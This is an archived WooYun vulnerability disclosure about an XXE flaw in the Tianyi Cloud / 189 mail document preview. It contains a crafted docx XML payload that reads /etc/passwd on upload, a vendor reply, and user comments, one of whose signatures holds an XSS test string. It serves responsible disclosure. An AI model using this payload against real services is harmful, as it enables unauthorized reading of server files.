天翼云一处xxe漏洞可读取任意文件

2015年6月22日18:59:19评论335 views字数 209阅读0分41秒阅读模式

摘要

2014-09-24：细节已通知厂商并且等待厂商处理中
2014-09-24：厂商已经确认，细节仅向厂商公开
2014-10-04：细节向核心白帽子及相关领域专家公开
2014-10-14：细节向普通白帽子公开
2014-10-24：细节向实习白帽子公开
2014-11-08：细节向公众公开

漏洞概要关注数(33) 关注此漏洞

缺陷编号： WooYun-2014-77146

漏洞标题：天翼云一处xxe漏洞可读取任意文件

漏洞作者： Rona

提交时间： 2014-09-24 11:36

公开时间： 2014-11-08 11:38

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

8人收藏

漏洞详情

披露状态：

简要描述：

天翼云一处xxe漏洞

详细说明：

解压缩docx文件，修改word/document.xml

189邮箱的文件预览页存在该问题。

code 区域

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 
 
 
 <!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 
 
 
 <w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

上传到文件云，预览触发。

漏洞证明：

修复方案：

处理解析

版权声明：转载请注明来源 Rona@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-09-24 17:57

厂商回复：

谢谢！已安排修复

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-24 13:47 | he1renyagao ( 普通白帽子 | Rank:235 漏洞数:31 | 是金子总会发光，在还未发光之前，先磨磨)

0

这个竟然没人关注？

1# 回复此人
2014-09-24 15:10 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

0

xxe都没接触过呀

2# 回复此人
2014-11-08 14:00 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

0

顶个，xxe，必关注

3# 回复此人
2014-11-08 15:48 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

0

XXE ....... 农村户口第一次听说! 求公布

4# 回复此人
2014-11-08 23:24 | 蚊子 ( 路人 | Rank:2 漏洞数:1 )

0

前段日子看了fb那篇文章才知道啥是xxe

5# 回复此人
2015-05-15 13:30 | 糖剩七颗 ( 普通白帽子 | Rank:674 漏洞数:90 | 当几个月码农再出来冒泡！)

0

@Rona 意思就是上传一个存在问题的word文件，进行自解压最后触发xxe？

6# 回复此人
2015-05-16 14:47 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

0

@糖剩七颗修改doc文件为.zip可以解压的。

7# 回复此人
2015-05-16 17:25 | 糖剩七颗 ( 普通白帽子 | Rank:674 漏洞数:90 | 当几个月码农再出来冒泡！)

0

@Rona 洞主方便私信个qq吗？有问题请教

8# 回复此人
2015-05-16 17:35 | 糖剩七颗 ( 普通白帽子 | Rank:674 漏洞数:90 | 当几个月码农再出来冒泡！)

0

@Rona 意思就是把doc的文件写上出发xxe的恶意代码，然后改为.zip最后上传预览就可以触发xxe？

9# 回复此人
2015-05-18 13:51 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

0

@糖剩七颗修改1.doc 为1.zip

10# 回复此人
2015-07-30 14:21 | sOnsec ( 普通白帽子 | Rank:116 漏洞数:31 | 安全是什么...)

0

又是XEE。

11# 回复此人

漏洞概要 关注数(33) 关注此漏洞